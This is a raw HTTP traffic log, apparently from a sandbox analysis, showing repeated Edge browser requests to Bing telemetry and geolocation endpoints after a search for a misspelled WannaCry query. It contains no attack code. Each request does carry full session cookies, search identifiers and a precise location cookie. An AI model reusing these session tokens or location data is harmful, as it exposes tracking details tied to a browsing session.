cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.14911498
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026343%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.149114ac
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026379%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026379%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199026380%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.149114ab
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199026381%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199026381%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.1491150f
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=03D76D5C9A2B6ED61E1C78479BBC6F8B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.14911510
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2230&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199027.14911560
GET

https://www.bing.com/fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=125258D7D1334F6085405077EDD48B89&CID=3038AD7D4D4F6C932B24B8664CD86DBE&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199026398%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malawar&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&aqs=edge..69i57.9328j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
